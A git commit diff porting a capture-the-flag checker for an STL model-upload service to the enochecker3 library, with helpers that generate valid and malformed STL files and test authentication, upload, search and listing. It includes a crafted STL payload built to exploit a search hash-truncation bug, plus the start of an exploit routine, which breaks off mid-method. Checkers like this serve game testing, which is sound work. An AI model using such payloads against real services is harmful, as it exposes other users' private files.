commit 7501a1d6c20581312eb37de883ab52e83e27c8fa
parent 0a00d31fa19062511e1208d1c037787476497e2f
Author: Louis Burda <quent.burda@gmail.com>
Date: Wed, 30 Jun 2021 22:52:52 +0200
refactor for enochecker3
Diffstat:
5 files changed, 761 insertions(+), 655 deletions(-)
diff --git a/checker/docker-compose.yml b/checker/docker-compose.yml
@@ -24,6 +24,8 @@ services:
# The python checkerlib requires a mongo db!
stldoctor-mongo:
image: mongo
+ ports:
+ - 27017:27017
volumes:
- ./data:/data/db
environment:
diff --git a/checker/local.sh b/checker/local.sh
@@ -0,0 +1,13 @@
+#!/bin/sh
+
+if [ -z "$(docker ps | grep stldoctor-mongo)" ]; then
+ docker-compose up -d stldoctor-mongo
+fi
+
+export MONGO_ENABLED=1
+export MONGO_HOST=localhost
+export MONGO_PORT=27017
+export MONGO_USER=stldoctor_checker
+export MONGO_PASSWORD=stldoctor_checker
+
+python3 src/checker.py $@
diff --git a/checker/src/checker.py b/checker/src/checker.py
@@ -1,20 +1,36 @@
#!/usr/bin/env python3
-from enochecker import BaseChecker, BrokenServiceException, EnoException, run
-from enochecker.utils import SimpleSocket
+
import logging, math, os, random, re, socket, string, struct, subprocess, selectors, time
import numpy as np
-from io import BytesIO
-from stl import mesh
logging.getLogger("faker").setLevel(logging.WARNING)
-logging.getLogger("pwnlib").setLevel(logging.WARNING)
logging.getLogger("_curses").setLevel(logging.CRITICAL)
-rand = random.SystemRandom()
-
+from enochecker3 import *
+from enochecker3.utils import *
from faker import Faker
+from io import BytesIO
+from stl import mesh
+
+from typing import (
+ Any,
+ Optional,
+ Tuple,
+ Union
+)
+
+from logging import LoggerAdapter
+
+from asyncio import StreamReader, StreamWriter
-evil_file = b"""
+rand = random.SystemRandom()
+generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
+script_path = os.path.dirname(os.path.realpath(__file__))
+models_path = f"{script_path}/models"
+extra_models = [f"{models_path}/{path}" for path in os.listdir(models_path) if path.endswith(".stl")]
+prompt = b"\r$ "
+
+search_truncation_payload = b"""
solid test\xff
facet normal 0 0 1.0
outer loop
@@ -26,76 +42,103 @@ solid test\xff
endsolid test\xff
"""
-generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
+checker = Enochecker("STLDoctor", 9090)
+app = lambda: checker.app
-script_path = os.path.dirname(os.path.realpath(__file__))
-models_path = f"{script_path}/models"
-extra_models = [f"{models_path}/{path}" for path in \
- os.listdir(models_path) if path.endswith(".stl")]
+class Session:
+ def __init__(self, socket: AsyncSocket) -> None:
+ self.reader: StreamReader = socket[0]
+ self.writer: StreamWriter = socket[1]
+
+ self.writer._write = self.writer.write
+ self.writer.write = Session.write.__get__(self.writer)
+
+ self.reader._readuntil = self.reader.readuntil
+ self.reader.readuntil = Session.readuntil.__get__(self.reader)
-def ensure_bytes(v):
+ def write(self: StreamWriter, data: Union[str, bytes]) -> None:
+ self._write(ensure_bytes(data))
+
+ def readuntil(self: StreamReader, data: Union[str, bytes]) -> bytes:
+ return self._readuntil(ensure_bytes(data))
+
+ async def __atexit__(self) -> None:
+ await self.close()
+
+ async def prepare(self) -> None:
+ await self.reader.readuntil(prompt)
+
+ async def close(self) -> None:
+ self.writer.write("exit\n")
+ await self.writer.drain()
+ await self.reader.readuntil("bye!") # ensure clean exit
+ self.writer.close()
+ await self.writer.wait_closed()
+
+@checker.register_dependency
+def _get_session(socket: AsyncSocket) -> Session:
+ return Session(socket)
+
+def ensure_bytes(v: Union[str,bytes]) -> bytes:
if type(v) == bytes:
return v
elif type(v) == str:
return v.encode()
else:
- raise BrokenServiceException("Tried to pass non str/bytes to bytes arg")
+ raise InternalErrorException("Tried to pass non str/bytes to bytes arg")
-def includes_all(resp, targets):
+def includes_all(resp: bytes, targets: Tuple[bytes, ...]) -> bool:
for m in targets:
if ensure_bytes(m) not in resp:
return False
return True
-def includes_any(resp, targets):
+def includes_any(resp: bytes, targets: Tuple[bytes, ...]) -> bool:
for m in targets:
if ensure_bytes(m) in resp:
return True
return False
-def fakeid():
- fake = Faker(["en_US"])
- idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".")
- idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)])
- return idstr
+def fakeid(havoc = False) -> bytes:
+ if havoc:
+ idlen = rand.randint(10, 40)
+ return bytes([rand.randint(32, 127) for i in range(idlen)])
+ else:
+ fake = Faker(["en_US"])
+ idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".")
+ idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)])
+ return idstr
-def havocid():
- idlen = rand.randint(10, 40)
- return bytes([rand.randint(32, 127) for i in range(idlen)])
+def fakeids(n: int, **kwargs) -> Tuple[bytes, ...]:
+ return [fakeid(**kwargs) for i in range(n)]
-def approx_equal(f1, f2, precision = 2):
+def approx_equal(f1: float, f2: float, precision: int = 2) -> bool:
return round(f1, precision) == round(f2, precision)
-def reverse_hash(hashstr):
+def reverse_hash(hashstr: Union[str, bytes]):
if type(hashstr) is bytes:
hashstr = hashstr.decode()
data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1]
if data == b"":
- raise BrokenServiceException(f"Failed to find hash preimage of {hashstr}")
+ raise InternalErrorException(f"Failed to find hash preimage of {hashstr}")
return data
-def check_line(conn, context):
- line = conn.recvline()
- if b"ERR:" in line:
- raise BrokenServiceException(f"{context}: Unexpected error message\n")
- return line
-
-def parse_int(intstr):
+def parse_int(intstr: Union[str, bytes]) -> Optional[int]:
try:
return int(intstr)
except:
return None
-def parse_float(floatstr):
+def parse_float(floatstr: Union[str, bytes]) -> Optional[float]:
try:
return float(floatstr)
except:
return None
-def has_alph(data, alph):
+def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool:
return len([v for v in data if v not in alph]) == 0
-def assert_match(data, pattern, exception):
+def assert_match(data: bytes, pattern: bytes, exception: Exception) -> bytes:
rem = re.search(pattern, data)
if rem is None:
raise exception(f"Expected pattern {pattern} to match {data}")
@@ -103,640 +146,688 @@ def assert_match(data, pattern, exception):
return rem.group(1)
return rem.group(0)
-class STLDoctorChecker(BaseChecker):
- service_name = "stldoctor"
- port = 9090
+def genfile_ascii(solidname: str, malformed: bool = None) -> bytes:
+ indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
+ solidname = ensure_bytes(solidname)
+ facet_count = rand.randint(4, 30)
- flag_variants = 2
- noise_variants = 2
- havoc_variants = 17
- exploit_variants = 2
+ if len(solidname) != 0:
+ content = b"solid " + solidname + b"\n"
+ else:
+ content = b"solid\n"
- prompt = b"\r$ "
+ for fi in range(facet_count):
+ # MALFORM 1: wrong keyword
+ if malformed == 1:
+ content += indent * 1 + b"facet nornal "
+ else:
+ content += indent * 1 + b"facet normal "
- # HELPER FUNCS #
+ vs = [[rand.random() for i in range(3)] for k in range(3)]
+ norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+ norm = norm / np.linalg.norm(norm)
- def querydb(self, *args):
- vals = []
- for arg in args:
- try:
- val: str = self.chain_db[arg]
- except KeyError as ex:
- raise BrokenServiceException(f"Invalid db contents, missing: {arg}")
- vals.append(val)
- return vals
+ content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
+
+ # MALFORM 2: wrong keyword case
+ if malformed == 2:
+ content += indent * 2 + b"outer lOop\n"
+ else:
+ content += indent * 2 + b"outer loop\n"
- def postdb(self, **kwdict):
- self.chain_db = kwdict
+ for i in range(3):
+ content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n"
- def genfile_ascii(self, solidname, malformed = None):
- indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
- solidname = ensure_bytes(solidname)
- facet_count = rand.randint(4, 30)
+ content += indent * 2 + b"endloop\n"
+ content += indent + b"endfacet\n"
- if len(solidname) != 0:
- content = b"solid " + solidname + b"\n"
+ # MALFORM 3: no endsolid keyword
+ if malformed != 3:
+ if solidname != b"":
+ content += b"endsolid " + solidname + b"\n"
else:
- content = b"solid\n"
+ content += b"endsolid\n"
- for fi in range(facet_count):
- # MALFORM 1: wrong keyword
- if malformed == 1:
- content += indent * 1 + b"facet nornal "
- else:
- content += indent * 1 + b"facet normal "
+ return content
- vs = [[rand.random() for i in range(3)] for k in range(3)]
- norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
- norm = norm / np.linalg.norm(norm)
+def genfile_bin(solidname: bytes, malformed: bool = None) -> bytes:
+ solidname = ensure_bytes(solidname)
+ facet_count = rand.randint(4, 30)
- content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"
+ if len(solidname) > 78:
+ raise InternalErrorException("Solidname to embed in header is larger than header itself")
+ if solidname != "":
+ content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
+ else:
+ content = b"#" + b"\x00" * 79
- # MALFORM 2: wrong keyword case
- if malformed == 2:
- content += indent * 2 + b"outer lOop\n"
- else:
- content += indent * 2 + b"outer loop\n"
+ # MALFORM 1: specify more facets than are in the file
+ if malformed == 1:
+ content += struct.pack("<I", facet_count + rand.randint(3, 7))
+ else:
+ content += struct.pack("<I", facet_count)
+
+ for fi in range(facet_count):
+ vs = [[rand.random() for i in range(3)] for k in range(3)]
+ norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+
+ # MALFORM 2: invalid float for norm / vec
+ if malformed == 2:
+ norm[rand.randint(0,2)] = math.nan
+ vs[rand.randint(0,2)][rand.randint(0,2)] = math.inf
+ for i in range(3):
+ content += struct.pack("<f", norm[i])
+ for k in range(3):
+ for i in range(3):
+ content += struct.pack("<f", vs[k][i])
+ content += b"\x00\x00"
+
+ # MALFORM 3: add extra data to the end of the file
+ if malformed == 3:
+ content += bytes([rand.randint(0, 255) for i in range(30)])
+
+ return content
+
+def genfile(solidname: bytes, filetype: str, malformed: Optional[bool] = None) -> bytes:
+ if filetype == "ascii":
+ return genfile_ascii(solidname, malformed = malformed)
+ elif filetype == "bin":
+ return genfile_bin(solidname, malformed = malformed)
+ elif filetype == "garbage-tiny":
+ return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(3, 8))])
+ elif filetype == "garbage":
+ return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(100, 300))])
+ else:
+ raise InternalErrorException("Invalid file type supplied")
+def parse_stlinfo(stlfile: bytes) -> Any:
+ fakefile = BytesIO()
+ fakefile.write(stlfile)
+ fakefile.seek(0)
+ try:
+ name, data = mesh.Mesh.load(fakefile)
+ meshinfo = mesh.Mesh(data, True, name=name, speedups=True)
+ except Exception as e:
+ raise InternalErrorException(f"Unable to parse generated STL file: {e}")
+ bmin = [math.inf for i in range(3)]
+ bmax = [-math.inf for i in range(3)]
+ if len(meshinfo.points) == 0:
+ raise InternalErrorException("Parsed STL mesh has 0 points!")
+ for p in meshinfo.points:
+ for k in range(3):
for i in range(3):
- content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n"
+ bmin[k] = min(bmin[k], float(p[3*i+k]))
+ bmax[k] = max(bmax[k], float(p[3*i+k]))
+ info = {
+ "points": meshinfo.points,
+ "bb_origin": bmin,
+ "bb_size": [bmax[i] - bmin[i] for i in range(3)],
+ "size": len(stlfile),
+ "triangle_count": len(meshinfo.points)
+ }
+ return info
+
+async def getdb(db: ChainDB, key: str) -> Tuple[Any, ...]:
+ try:
+ return await db.get(key)
+ except KeyError:
+ raise MumbleException("Could not retrieve necessary info for service interaction")
+
+# SERVICE FUNCTIONS #
+
+async def do_auth(session: Session, logger: LoggerAdapter, authstr: bytes, check: bool = True) -> Optional[bytes]:
+ authstr = ensure_bytes(authstr)
+ logger.debug(f"Logging in with {authstr}")
+ session.writer.write("auth\n")
+ session.writer.write(authstr + b"\n")
+ await session.writer.drain()
+
+ # Check for errors
+ resp = await session.reader.readline()
+ if b"ERR:" in resp:
+ if check:
+ logger.critical(f"Failed to login with {authstr}:\n{resp}")
+ raise MumbleException("Authentication not working properly")
+ return None
- content += indent * 2 + b"endloop\n"
- content += indent + b"endfacet\n"
+ # Also check success message
+ resp += await session.reader.readuntil(prompt)
+ if b"Success!" not in resp:
+ logger.critical(f"Login with pass {authstr} failed")
+ raise MumbleException("Authentication not working properly")
- # MALFORM 3: no endsolid keyword
- if malformed != 3:
- if solidname != b"":
- content += b"endsolid " + solidname + b"\n"
- else:
- content += b"endsolid\n"
+ return b"Welcome back" in resp
- return content
+async def do_list(session: Session, logger: LoggerAdapter, check: bool = True) -> Optional[bytes]:
+ session.writer.write("list\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil(prompt)
- def genfile_bin(self, solidname, malformed = None):
- solidname = ensure_bytes(solidname)
- facet_count = rand.randint(4, 30)
+ # Check for errors
+ if b"ERR:" in resp and b">> " not in resp:
+ if check:
+ logger.critical(f"Failed to list private files:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return None
- if len(solidname) > 78:
- raise EnoException("Solidname to embed in header is larger than header itself")
- if solidname != "":
- content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
- else:
- content = b"#" + b"\x00" * 79
+ return resp
+
+async def do_upload(session: Session, logger: LoggerAdapter, modelname: str, stlfile: str, check: bool = True) -> Optional[bytes]:
+ modelname = ensure_bytes(modelname)
+
+ # Upload file
+ logger.debug(f"Uploading model with name {modelname}")
+ session.writer.write("upload\n")
+ session.writer.write(modelname + b"\n")
+ session.writer.write(f"{len(stlfile)}\n")
+ session.writer.write(stlfile)
+ await session.writer.drain()
+
+ # Check for errors
+ # TODO improve by reading responses separately
+ resp = await session.reader.readline()
+ resp += await session.reader.readline()
+ if b"ERR:" in resp:
+ if check:
+ logger.critical(f"Failed to upload model {modelname}:\n{resp}")
+ raise MumbleException("File upload not working properly")
+ await session.reader.readuntil(prompt)
+ return None
- # MALFORM 1: specify more facets than are in the file
- if malformed == 1:
- content += struct.pack("<I", facet_count + rand.randint(3, 7))
- else:
- content += struct.pack("<I", facet_count)
+ # Parse ID
+ try:
+ modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
+ if modelid == b"": raise Exception
+ except:
+ logger.critical(f"Invalid response during upload of {modelname}:\n{resp}")
+ raise MumbleException("File upload not working properly")
- for fi in range(facet_count):
- vs = [[rand.random() for i in range(3)] for k in range(3)]
- norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0]))
+ await session.reader.readuntil(prompt)
+ return modelid
- # MALFORM 2: invalid float for norm / vec
- if malformed == 2:
- norm[rand.randint(0,2)] = math.nan
- vs[rand.randint(0,2)][rand.randint(0,2)] = math.inf
- for i in range(3):
- content += struct.pack("<f", norm[i])
- for k in range(3):
- for i in range(3):
- content += struct.pack("<f", vs[k][i])
- content += b"\x00\x00"
-
- # MALFORM 3: add extra data to the end of the file
- if malformed == 3:
- content += bytes([rand.randint(0, 255) for i in range(30)])
-
- return content
-
- def genfile(self, solidname, filetype, malformed = None):
- if filetype == "ascii":
- return self.genfile_ascii(solidname, malformed = malformed)
- elif filetype == "bin":
- return self.genfile_bin(solidname, malformed = malformed)
- elif filetype == "garbage-tiny":
- return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(3, 8))])
- elif filetype == "garbage":
- return bytes([ord(rand.choice(generic_alphabet)) for i in range(rand.randint(100, 300))])
- else:
- raise EnoException("Invalid file type supplied")
-
- def parse_stlinfo(self, stlfile):
- fakefile = BytesIO()
- fakefile.write(stlfile)
- fakefile.seek(0)
- try:
- name, data = mesh.Mesh.load(fakefile)
- meshinfo = mesh.Mesh(data, True, name=name, speedups=True)
- except Exception as e:
- raise BrokenServiceException(f"STL file parsing failed: {e}")
- bmin = [math.inf for i in range(3)]
- bmax = [-math.inf for i in range(3)]
- if len(meshinfo.points) == 0:
- raise EnoException("Parsed STL mesh has 0 points!")
- for p in meshinfo.points:
- for k in range(3):
- for i in range(3):
- bmin[k] = min(bmin[k], float(p[3*i+k]))
- bmax[k] = max(bmax[k], float(p[3*i+k]))
- info = {
- "points": meshinfo.points,
- "bb_origin": bmin,
- "bb_size": [bmax[i] - bmin[i] for i in range(3)],
- "size": len(stlfile),
- "triangle_count": len(meshinfo.points)
- }
- return info
-
- def openconn(self):
- conn = self.connect()
- resp = conn.recvuntil(b'\n' + self.prompt)
- return conn
-
- def closeconn(self, conn):
- self.debug("Sending exit command")
- conn.write("exit\n")
- conn.recvuntil("bye!") # ensure clean exit
- conn.close()
-
- def do_auth(self, conn, authstr, check = True):
- authstr = ensure_bytes(authstr)
- self.debug(f"Logging in with {authstr}")
- conn.write("auth\n")
- conn.write(authstr + b"\n")
-
- # Check for errors
- resp = conn.recvline()
- if b"ERR:" in resp:
- if check:
- raise BrokenServiceException(f"Failed to login with {authstr}:\n{resp}")
- return None
-
- # Also check success message
- resp += conn.recvuntil(self.prompt)
- if b"Success!" not in resp:
- raise BrokenServiceException(f"Login with pass {authstr} failed")
- return b"Welcome back" in resp
-
- def do_list(self, conn, check = True):
- conn.write("list\n")
- resp = conn.recvuntil(self.prompt)
-
- # Check for errors
- if b"ERR:" in resp and b">> " not in resp:
- if check:
- raise BrokenServiceException(f"Failed to list private files:\n{resp}")
- return None
-
- return resp
-
- def do_upload(self, conn, modelname, stlfile, check = True):
- modelname = ensure_bytes(modelname)
-
- # Upload file
- self.debug(f"Uploading model with name {modelname}")
- conn.write("upload\n")
- conn.write(modelname + b"\n")
- conn.write(f"{len(stlfile)}\n")
- conn.write(stlfile)
-
- # Check for errors
- resp = conn.recvline() + conn.recvline()
- if b"ERR:" in resp:
- if check:
- raise BrokenServiceException(f"Failed to upload model {modelname}:\n{line}")
- conn.recvuntil(self.prompt)
- return None
-
- # Parse ID
- try:
- modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
- if modelid == b"": raise Exception
- except:
- raise BrokenServiceException(f"Invalid response during upload of {modelname}:\n{line}")
-
- conn.recvuntil(self.prompt)
- return modelid
-
- def do_search(self, conn, modelname, download = False, check = True):
- modelname = ensure_bytes(modelname)
-
- # Initiate download
- self.debug(f"Retrieving model with name {modelname}")
- conn.write(b"search " + modelname + b"\n")
- conn.write("0\n") # first result
- conn.write("y\n" if download else "n\n")
- conn.write("q\n") # quit
-
- # Check if an error occured
- line = conn.recvline()
- if b"ERR:" in line:
- if check:
- raise BrokenServiceException(f"Failed to retrieve model {modelname}:\n{line}")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- conn.recvuntil(self.prompt)
- return None
-
- # Recv until end of info box
- fileinfo = line + conn.recvuntil("================== \n")
-
- stlfile = b""
- if download: # Parse file contents
- conn.recvuntil(b"Here you go.. (")
- resp = conn.recvuntil(b"B)\n")[:-3]
- size = parse_int(resp)
- if size is None:
- raise BrokenServiceException(f"Received invalid download size, response:\n{resp}")
-
- self.debug(f"Download size: {size}")
- stlfile = conn.recvn(size)
-
- conn.recvuntil(self.prompt)
- return fileinfo, stlfile
-
- # CHECK WRAPPERS #
-
- def check_listed(self, conn, includes):
- resp = self.do_list(conn, check = True)
- if not includes_all(resp, includes):
- raise BrokenServiceException(f"Failed to find {includes} in listing:\n{resp}")
- return resp
-
- def check_not_listed(self, conn, excludes, fail = False):
- resp = self.do_list(conn, check = False)
- if fail and resp:
- raise BrokenServiceException(f"Expected list to fail, but returned:\n{resp}")
- if not fail and not resp:
- raise BrokenServiceException(f"List failed unexpectedly:\n{resp}")
- if resp and includes_any(resp, excludes):
- raise BrokenServiceException(f"Unexpectedly found one of {excludes} in listing:\n{resp}")
- return resp
-
- def check_in_search(self, conn, modelname, includes, download = False):
- info, stlfile = self.do_search(conn, modelname, download, check = True)
- if not includes_all(info + stlfile, includes):
- raise BrokenServiceException(f"Retrieved info for {modelname} is missing {includes}: {resp}")
- return info, stlfile
-
- def check_not_in_search(self, conn, modelname, excludes, download = False, fail = False):
- resp = self.do_search(conn, modelname, download, check = False)
- if resp:
- combined = resp[0]+resp[1]
- if fail and resp:
- raise BrokenServiceException("Search for {modelname} succeeded unexpectedly:\n{combined}")
- if not fail and not resp:
- raise BrokenServiceException(f"Search for {modelname} failed unexpectedly:\n{resp}")
- if resp and includes_any(resp[0] + resp[1], excludes):
- raise BrokenServiceException(f"Unexpectedly {modelname} info contains one of {includes}: {combined}")
- return resp
-
- def check_hash(self, hashstr):
- if not has_alph(hashstr, b"0123456789abcdef"):
- raise BrokenServiceException("Hash is not a hexadecimal number")
-
- def check_stlinfo(self, resp, ref_info, ref_modelid = None,
- ref_modelname = None, ref_solidname = None):
- size = parse_int(assert_match(resp, b"File Size: (.*)\n", BrokenServiceException))
- if not size or size != ref_info["size"]:
- raise BrokenServiceException(f"STL info returned no / invalid file size: {size} != {ref_info['size']}")
-
- triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException))
- if not triangle_count or triangle_count != ref_info["triangle_count"]:
- raise BrokenServiceException(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}")
-
- bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", BrokenServiceException)
- bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
- if None in bb_size:
- raise BrokenServiceException(f"STL info returned invalid bounding box size: {bb_size_str}")
- if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]:
- raise BrokenServiceException(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}")
-
- bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", BrokenServiceException)
- bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
- if None in bb_origin:
- raise BrokenServiceException(f"STL info returned invalid bounding box origin: {bb_origin_str}")
- if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]:
- raise BrokenServiceException(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}")
-
- triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", BrokenServiceException))
- if triangle_count is None or triangle_count != ref_info["triangle_count"]:
- raise BrokenServiceException(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}")
-
- if ref_modelname:
- modelname = assert_match(resp, b"Model Name: (.*)\n", BrokenServiceException)
- if modelname != ref_modelname:
- raise BrokenServiceException(f"Got modelname {modelname}, expected {ref_modelname}")
-
- if ref_modelid:
- modelid = assert_match(resp, b"Model ID: (.*)\n", BrokenServiceException)
- if modelid != ref_modelid:
- raise BrokenServiceException(f"Got modelid {modelid}, expected {ref_modelid}")
-
- if ref_solidname:
- solidname = assert_match(resp, b"Solid Name: (.*)\n", BrokenServiceException)
- if solidname != ref_solidname:
- raise BrokenServiceException(f"Got solidname {solidname}, expected {ref_solidname}")
-
-
- # TEST METHODS #
-
- def test_good_upload(self, filetype, register):
- # ASCII Solidname cant be havocid since it might mess with parsing
- solidname = fakeid() if filetype == "ascii" else havocid()
- modelname = havocid()
- authstr = havocid()
- stlfile = self.genfile(solidname, filetype)
-
- # Calculate properties to test response against
- ref_info = self.parse_stlinfo(stlfile)
-
- # Create new session and user and upload file
- conn = self.openconn()
- if register:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_hash(modelid)
- expected = [modelname, solidname, stlfile, modelid]
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
- if register:
- resp = self.check_listed(conn, [modelname, modelid + b"-"])
- self.closeconn(conn)
-
- # Try getting file from a new session
- conn = self.openconn()
- if register:
- self.check_not_in_search(conn, modelname, expected, download = True, fail = True)
- self.do_auth(conn, authstr)
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
- self.check_listed(conn, [modelname, modelid + b"-"])
- else:
- info, stlfile = self.check_in_search(conn, modelname, expected, download = True)
- self.check_stlinfo(info, ref_info, ref_modelname = modelname,
- ref_modelid = modelid, ref_solidname = solidname)
-
- self.closeconn(conn)
-
- def test_bad_upload(self, filetype, variant):
- stlfile = self.genfile(fakeid(), filetype, malformed = variant)
-
- conn = self.openconn()
- if self.do_upload(conn, fakeid(), stlfile, check = False):
- raise BrokenServiceException(f"Able to upload malformed file:\n{stlfile}")
- self.closeconn(conn)
-
- def test_search(self, registered = False):
- solidname = fakeid()
- modelname = fakeid()
- modelname2 = fakeid()
- authstr = fakeid()
- stlfile = self.genfile(solidname, "bin")
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_not_in_search(conn, modelname2, [modelname, modelid],
- download = True, fail = True)
- self.check_in_search(conn, modelname, [modelname, modelid], download = True)
- self.closeconn(conn)
-
- def test_list(self, registered = False):
- solidname = fakeid()
- modelname = fakeid()
- authstr = fakeid()
- authstr2 = fakeid()
- stlfile = self.genfile(solidname, "bin")
-
- conn = self.openconn()
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_listed(conn, [modelname, modelid + b"-"])
- self.closeconn(conn)
-
- if registered:
- conn = self.openconn()
- if self.do_auth(conn, authstr2):
- raise BrokenServiceException("New authstr {authstr2} has user dir")
- self.check_not_listed(conn, [modelid, modelname])
- self.closeconn(conn)
- else:
- conn = self.openconn()
- self.check_not_listed(conn, [modelid, modelname], fail = True)
- self.closeconn(conn)
-
- # CHECKER METHODS #
-
- def putflag(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelname = fakeid()
- types = ["ascii", "bin"]
- registered = (self.variant_id == 1)
- stlfile = self.genfile(self.flag, types[self.variant_id])
- authstr = fakeid() if registered else ""
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.closeconn(conn)
-
- self.postdb(modelid = modelid, modelname = modelname, authstr = authstr)
- else:
- raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided")
-
- def getflag(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelid, modelname, authstr = self.querydb("modelid", "modelname", "authstr")
- registered = (self.variant_id == 1)
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- info, stlfile = self.do_search(conn, modelname, download = True)
- if self.flag.encode() not in info + stlfile:
- raise BrokenServiceException(f"Flag {self.flag} not found in search:\n{info}\n{stlfile}")
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided")
-
- def putnoise(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelname = fakeid()
- solidname = fakeid()
- types = ["bin", "ascii"]
- registered = (self.variant_id == 1)
- authstr = fakeid() if registered else ""
- stlfile = self.genfile(solidname, types[self.variant_id])
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.closeconn(conn)
-
- self.postdb(modelid = modelid, modelname = modelname,
- solidname = solidname, stlfile = stlfile, authstr = authstr)
- else:
- raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided")
-
- def getnoise(self): # type: () -> None
- if self.variant_id in (0, 1):
- modelid, modelname, solidname, stlfile, authstr \
- = self.querydb("modelid", "modelname", "solidname", "stlfile", "authstr")
- registered = (self.variant_id == 1)
- expected = [modelname, solidname, stlfile, modelid]
-
- conn = self.openconn()
- if registered:
- self.do_auth(conn, authstr)
- self.check_in_search(conn, modelname, expected, download = True)
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid noise variant ({self.variant_id}) provided")
-
- def havoc(self): # type: () -> None
- if self.variant_id == 0:
- self.test_good_upload("ascii", False)
- elif self.variant_id == 1:
- self.test_good_upload("bin", False)
- elif self.variant_id == 2:
- self.test_good_upload("ascii", True)
- elif self.variant_id == 3:
- self.test_good_upload("bin", True)
- elif self.variant_id == 4:
- self.test_bad_upload("ascii", variant = 1)
- elif self.variant_id == 5:
- self.test_bad_upload("ascii", variant = 2)
- elif self.variant_id == 6:
- self.test_bad_upload("ascii", variant = 3)
- elif self.variant_id == 7:
- self.test_bad_upload("bin", variant = 1)
- elif self.variant_id == 8:
- self.test_bad_upload("bin", variant = 2)
- elif self.variant_id == 9:
- self.test_bad_upload("bin", variant = 3)
- elif self.variant_id == 10:
- self.test_bad_upload("garbage", variant = 1)
- elif self.variant_id == 11:
- self.test_bad_upload("garbage-tiny", variant = 1)
- elif self.variant_id == 12:
- self.test_search(False)
- elif self.variant_id == 13:
- self.test_search(True)
- elif self.variant_id == 14:
- self.test_list(False)
- elif self.variant_id == 15:
- self.test_list(True)
- elif self.variant_id == 16:
- if len(extra_models) == 0:
- return
- # upload spicy models
- conn = self.openconn()
- model = rand.choice(extra_models)
- modelname = os.path.basename(model).split("-")[0]
- modelname += "".join([rand.choice("0123456789") for i in range(5)])
- stlfile = open(model, "rb").read()
- self.debug(stlfile)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_in_search(conn, modelname, [modelname, modelid, stlfile], download = True)
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided")
-
- def exploit(self): # type: () -> None
- if self.variant_id == 0:
- modelname = fakeid()
-
- # Upload evil file for parse via search for hash truncation
- self.debug(f"Uploading evil file for hash truncation")
